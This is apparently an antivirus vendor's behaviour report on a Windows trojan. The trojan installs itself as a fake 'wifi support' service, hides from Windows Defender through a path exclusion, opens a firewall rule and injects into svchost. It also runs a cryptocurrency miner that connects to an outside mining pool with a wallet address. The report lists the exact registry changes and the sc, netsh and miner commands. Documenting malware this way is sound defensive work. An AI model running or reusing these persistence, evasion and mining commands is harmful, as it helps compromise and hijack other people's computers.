Technical Information
To ensure autorun and distribution
Sets the following service settings
- [<HKLM>\System\CurrentControlSet\Services\iaipzvya] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\iaipzvya] 'ImagePath' = '%WINDIR%\SysWOW64\iaipzvya\hyubsrvz.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\iaipzvya] 'ImagePath' = '%WINDIR%\SysWOW64\iaipzvya\hyubsrvz.exe'
Creates the following services
- 'iaipzvya' %WINDIR%\SysWOW64\iaipzvya\hyubsrvz.exe /d"<Full path to file>"
- 'iaipzvya' %WINDIR%\SysWOW64\iaipzvya\hyubsrvz.exe
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\iaipzvya' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\hyubsrvz.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Moves the following files
- from %TEMP%\hyubsrvz.exe to %WINDIR%\syswow64\iaipzvya\hyubsrvz.exe
Deletes itself.
Network activity
TCP
HTTP GET requests
- http://www.google.com/
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK ms#.##ol.gntl.co.uk
- DNS ASK google.com
- DNS ASK in###gram.com
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\iaipzvya\hyubsrvz.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\iaipzvya\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\hyubsrvz.exe" %WINDIR%\SysWOW64\iaipzvya\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create iaipzvya binPath= "%WINDIR%\SysWOW64\iaipzvya\hyubsrvz.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description iaipzvya "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start iaipzvya' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\iaipzvya\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\hyubsrvz.exe" %WINDIR%\SysWOW64\iaipzvya\
- '%WINDIR%\syswow64\sc.exe' create iaipzvya binPath= "%WINDIR%\SysWOW64\iaipzvya\hyubsrvz.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description iaipzvya "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start iaipzvya
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+58000 -p x -k
